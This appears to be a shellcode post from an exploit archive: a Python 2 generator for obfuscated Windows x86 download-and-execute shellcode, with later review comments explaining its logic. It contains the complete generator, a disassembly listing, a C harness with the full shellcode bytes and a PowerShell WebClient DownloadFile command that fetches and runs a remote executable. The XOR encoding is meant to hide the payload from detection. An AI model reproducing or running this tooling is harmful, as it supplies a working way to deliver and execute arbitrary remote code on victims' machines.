
Shellcode Win x86-64 - Download & execute (Generator)


#Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [use PowerShell] - Generator

#length: Dynamic — depends on the URL and the filename

#Date: 20 January 2015

#Author: Ali Razmjoo

#tested On: Windows 7 x64 ultimate

#WinExec => 0x77b1e695

#ExitProcess => 0x77ae2acf

#====================================

#Execute :

#powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe"

#====================================

#Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']

#Thanks to my friends , Dariush Nasirpour and Ehsan Nezami

####################################################

#How does it work?

'''

C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py"

Enter url

Example: http://z3r0d4y.com/file.exe

Enter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe

Enter filename

Example: D:\file.exe

Enter:C:\Ali.exe

C:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.o

C:\Users\Ali\Desktop>objdump -D shellcode.o

shellcode.o: file format elf32-i386

Disassembly of section .text:

00000000 <.text>:

0: 31 c0 xor %eax,%eax

2: 50 push %eax

3: 68 41 41 65 22 push $0x22654141

8: 58 pop %eax

9: c1 e8 08 shr $0x8,%eax

c: c1 e8 08 shr $0x8,%eax

f: 50 push %eax

10: b8 34 47 0b 4d mov $0x4d0b4734,%eax

15: bb 5d 69 6e 35 mov $0x356e695d,%ebx

1a: 31 d8 xor %ebx,%eax

1c: 50 push %eax

1d: b8 43 32 10 22 mov $0x22103243,%eax

22: bb 79 6e 51 4e mov $0x4e516e79,%ebx

27: 31 d8 xor %ebx,%eax

29: 50 push %eax

2a: b8 60 05 42 32 mov $0x32420560,%eax

2f: bb 49 78 79 71 mov $0x71797849,%ebx

34: 31 d8 xor %ebx,%eax

36: 50 push %eax

37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax

3c: bb 6a 64 49 33 mov $0x3349646a,%ebx

41: 31 d8 xor %ebx,%eax

43: 50 push %eax

44: b8 07 3e 0b 40 mov $0x400b3e07,%eax

49: bb 46 52 62 6e mov $0x6e625246,%ebx

4e: 31 d8 xor %ebx,%eax

50: 50 push %eax

51: b8 44 0a 78 07 mov $0x7780a44,%eax

56: bb 63 49 42 5b mov $0x5b424963,%ebx

5b: 31 d8 xor %ebx,%eax

5d: 50 push %eax

5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax

63: bb 6a 31 67 2d mov $0x2d67316a,%ebx

68: 31 d8 xor %ebx,%eax

6a: 50 push %eax

6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax

70: bb 61 4c 39 67 mov $0x67394c61,%ebx

75: 31 d8 xor %ebx,%eax

77: 50 push %eax

78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax

7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx

82: 31 d8 xor %ebx,%eax

84: 50 push %eax

85: b8 45 40 41 66 mov $0x66414045,%eax

8a: bb 3d 78 77 49 mov $0x4977783d,%ebx

8f: 31 d8 xor %ebx,%eax

91: 50 push %eax

92: b8 02 1f 4b 45 mov $0x454b1f02,%eax

97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx

9c: 31 d8 xor %ebx,%eax

9e: 50 push %eax

9f: b8 24 3e 19 32 mov $0x32193e24,%eax

a4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebx

a9: 31 d8 xor %ebx,%eax

ab: 50 push %eax

ac: b8 00 5e 3a 35 mov $0x353a5e00,%eax

b1: bb 6c 73 49 5b mov $0x5b49736c,%ebx

b6: 31 d8 xor %ebx,%eax

b8: 50 push %eax

b9: b8 1f 37 40 24 mov $0x2440371f,%eax

be: bb 6d 52 32 41 mov $0x4132526d,%ebx

c3: 31 d8 xor %ebx,%eax

c5: 50 push %eax

c6: b8 2e 35 68 31 mov $0x3168352e,%eax

cb: bb 5a 4c 45 41 mov $0x41454c5a,%ebx

d0: 31 d8 xor %ebx,%eax

d2: 50 push %eax

d3: b8 48 1e 1c 15 mov $0x151c1e48,%eax

d8: bb 67 6e 69 61 mov $0x61696e67,%ebx

dd: 31 d8 xor %ebx,%eax

df: 50 push %eax

e0: b8 26 28 0d 5d mov $0x5d0d2826,%eax

e5: bb 4f 45 62 33 mov $0x3362454f,%ebx

ea: 31 d8 xor %ebx,%eax

ec: 50 push %eax

ed: b8 20 57 1d 45 mov $0x451d5720,%eax

f2: bb 47 78 63 36 mov $0x36637847,%ebx

f7: 31 d8 xor %ebx,%eax

f9: 50 push %eax

fa: b8 04 6a 24 3b mov $0x3b246a04,%eax

ff: bb 77 44 4b 49 mov $0x494b4477,%ebx

104: 31 d8 xor %ebx,%eax

106: 50 push %eax

107: b8 18 0f 0a 32 mov $0x320a0f18,%eax

10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx

111: 31 d8 xor %ebx,%eax

113: 50 push %eax

114: b8 7d 18 3c 27 mov $0x273c187d,%eax

119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx

11e: 31 d8 xor %ebx,%eax

120: 50 push %eax

121: b8 03 44 60 60 mov $0x60604403,%eax

126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx

12b: 31 d8 xor %ebx,%eax

12d: 50 push %eax

12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax

133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx

138: 31 d8 xor %ebx,%eax

13a: 50 push %eax

13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax

140: bb 6c 37 47 45 mov $0x4547376c,%ebx

145: 31 d8 xor %ebx,%eax

147: 50 push %eax

148: b8 59 07 12 0e mov $0xe120759,%eax

14d: bb 35 68 73 6a mov $0x6a736835,%ebx

152: 31 d8 xor %ebx,%eax

154: 50 push %eax

155: b8 01 59 11 2c mov $0x2c115901,%eax

15a: bb 45 36 66 42 mov $0x42663645,%ebx

15f: 31 d8 xor %ebx,%eax

161: 50 push %eax

162: b8 22 22 4e 5a mov $0x5a4e2222,%eax

167: bb 4c 56 67 74 mov $0x7467564c,%ebx

16c: 31 d8 xor %ebx,%eax

16e: 50 push %eax

16f: b8 00 37 1b 48 mov $0x481b3700,%eax

174: bb 43 5b 72 2d mov $0x2d725b43,%ebx

179: 31 d8 xor %ebx,%eax

17b: 50 push %eax

17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax

181: bb 64 48 47 71 mov $0x71474864,%ebx

186: 31 d8 xor %ebx,%eax

188: 50 push %eax

189: b8 6a 23 03 18 mov $0x1803236a,%eax

18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx

193: 31 d8 xor %ebx,%eax

195: 50 push %eax

196: b8 2d 54 57 1c mov $0x1c57542d,%eax

19b: bb 47 31 34 68 mov $0x68343147,%ebx

1a0: 31 d8 xor %ebx,%eax

1a2: 50 push %eax

1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax

1a8: bb 39 38 79 38 mov $0x38793839,%ebx

1ad: 31 d8 xor %ebx,%eax

1af: 50 push %eax

1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax

1b5: bb 79 57 51 61 mov $0x61515779,%ebx

1ba: 31 d8 xor %ebx,%eax

1bc: 50 push %eax

1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax

1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx

1c7: 31 d8 xor %ebx,%eax

1c9: 50 push %eax

1ca: b8 2c 18 08 54 mov $0x5408182c,%eax

1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx

1d4: 31 d8 xor %ebx,%eax

1d6: 50 push %eax

1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax

1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx

1e1: 31 d8 xor %ebx,%eax

1e3: 50 push %eax

1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax

1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx

1ee: 31 d8 xor %ebx,%eax

1f0: 50 push %eax

1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax

1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx

1fb: 31 d8 xor %ebx,%eax

1fd: 50 push %eax

1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax

203: bb 39 44 61 4f mov $0x4f614439,%ebx

208: 31 d8 xor %ebx,%eax

20a: 50 push %eax

20b: 89 e0 mov %esp,%eax

20d: bb 41 41 41 01 mov $0x1414141,%ebx

212: c1 eb 08 shr $0x8,%ebx

215: c1 eb 08 shr $0x8,%ebx

218: c1 eb 08 shr $0x8,%ebx

21b: 53 push %ebx

21c: 50 push %eax

21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx

222: ff d3 call *%ebx

224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx

229: ff d3 call *%ebx

C:\Users\Ali\Desktop>

#you have your shellcode now

=======================================

shellcode.c

#include <stdio.h>

#include <string.h>

int main(){

unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b
\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3";

fprintf(stdout,"Length: %d\n\n",strlen(shellcode));

(*(void(*)()) shellcode)();

}

=======================================

C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exe

C:\Users\Ali\Desktop>shellcode.exe

Length: 173

C:\Users\Ali\Desktop>

#notice: when the program exits, wait 2-3 seconds; the download finishes and the file is executed after 2-3 seconds

'''

import random,binascii

# NOTE(review): Python 2 only. raw_input(), str.encode('hex') and the integer
# result of `/` used below all fail under Python 3.
# NOTE(review): the forum paste lost all indentation; the comments below state
# which lines belong to which loop/if body so the structure can be followed.

# Alphabet for the random 4-byte XOR key emitted per dword. Every character is
# printable ASCII, so the key immediates written into the assembly contain no
# zero bytes.
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-'

# Prologue of the generated assembly: push a zero dword first. Every later push
# lands below it, so this dword sits just past the end of the pushed string and
# effectively acts as its NUL terminator.
p1 = '''xor eax,eax
push eax
'''

# Epilogue of the generated assembly:
#   mov eax,esp        -> eax = address of the string assembled on the stack
#   0x01414141 >> 24   -> ebx = 1 without a zero byte in the immediate
#   push ebx / push eax-> two call arguments, pushed right to left
#   call 0x77b1e695    -> WinExec per the header comment
#   call 0x77ae2acf    -> ExitProcess per the header comment
# NOTE(review): both targets are absolute addresses taken from the header
# ("tested On: Windows 7 x64"); the output is therefore tied to the library
# layout of the author's test system rather than resolving the APIs at runtime.
p2 = '''
mov eax,esp
mov ebx,0x01414141
shr ebx,0x08
shr ebx,0x08
shr ebx,0x08
push ebx
push eax
mov ebx,0x77b1e695
call ebx
mov ebx,0x77ae2acf
call ebx
'''

# Interactive inputs. rsplit() with no separator splits on whitespace and [0]
# keeps only the first token, so anything after a space in the input is dropped.
sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:'))
sen1 = sen1.rsplit()
sen1 = sen1[0]
sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:'))
sen2 = sen2.rsplit()
sen2 = sen2[0]

# Cleartext command line that the generated code hands to WinExec. Only the
# dwords in the assembly are XOR-encoded; at run time this string is rebuilt on
# the stack in the clear, so a `powershell -command ... Net.WebClient ...
# DownloadFile(...)` line is what shows up in process command-line logging.
sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2)

# m = len(sen) - 1, computed by counting characters by hand (loop body: m += 1).
m = 0
for word in sen:
m += 1
m = m - 1

# Reverse the command string into `stack` (loop body: the two lines after
# while). The string is emitted as a sequence of pushes, and the stack grows
# downward, so the tail of the string has to be pushed first.
stack = ''
while(m>=0):
stack += sen[m]
m -= 1

# Hex-encode the reversed string (Python 2 str.encode('hex')).
stack = stack.encode('hex')

# Pad `stack` to a whole number of dwords (8 hex digits) by prefixing '00' up to
# three times. Because `stack` is the reversed string, each leading '00' here
# becomes a trailing NUL byte of the original string in memory. Each `if` body
# is the single line following it.
# NOTE(review): `skip is 1` / `skip is 0` compare ints by identity; it works in
# CPython because of small-int caching, but `==` is the correct operator.
skip = 1
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0

# Everything below is the body of this `if` (always true after the padding
# above). `zxzxzxz` is an unused placeholder assignment.
if len(stack) % 8 == 0:
zxzxzxz = 0
m = len(stack) / 8     # number of dwords to emit (Python 2 integer division)
c = 0                  # dwords emitted so far
n = 0                  # start of the current 8-hex-digit window into `stack`
z = 8                  # end of the current window

# Write the prologue (truncating any previous shellcode.asm in the current
# directory), then reopen in append mode for the per-dword output.
shf = open('shellcode.asm','w')
shf.write(p1)
shf.close()
shf = open('shellcode.asm','a')

# Per-dword loop; its body runs through `c += 1`.
while(c<m):
v = 'push 0x' + stack[n:z]
skip = 0

# Dwords that start with padding zeros (only the first chunk can, since the
# rest of `stack` is hex of printable characters). 'push 0x' is 7 characters,
# so v[13:], v[11:] and v[9:] are the hex digits after 6, 4 or 2 leading zeros.
# The zeros are replaced by 0x41 filler in the immediate and restored at run
# time with one `shr eax,0x08` per zero byte. The three checks run in
# descending prefix length; the rewritten text no longer contains '0x00', so
# only one of them fires per chunk. Each `if` body is the three lines after it.
if '0x000000' in v:
skip = 1
q1 = v[13:]
v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n'
if '0x0000' in v:
skip = 1
q1 = v[11:]
v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n'
if '0x00' in v:
skip = 1
q1 = v[9:]
v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n'

# Zero-prefixed chunk: write the push/pop/shr sequence as is (body: one line).
if skip is 1:
shf.write(v)

# Ordinary chunk (body: everything through the second shf.write). Recover the
# '0x...' token from the text built above, draw a random 4-character key from
# `chars`, XOR the dword with it and emit
#   mov eax,<dword ^ key> ; mov ebx,<key> ; xor eax,ebx ; push eax
# "%x" drops leading zeros of the XOR result; nasm reads the shorter literal as
# the same value.
if skip is 0:
v = v.rsplit()
zzz = ''
for w in v:
if '0x' in w:
zzz = str(w)
s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4)))
s1 = '0x%s'%s1
data = "%x" % (int(zzz, 16) ^ int(s1, 16))
v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1)
shf.write(v)

# Advance the window to the next dword.
n += 8
z += 8
c += 1

# Append the epilogue and close the output file.
shf.write(p2)
shf.close()
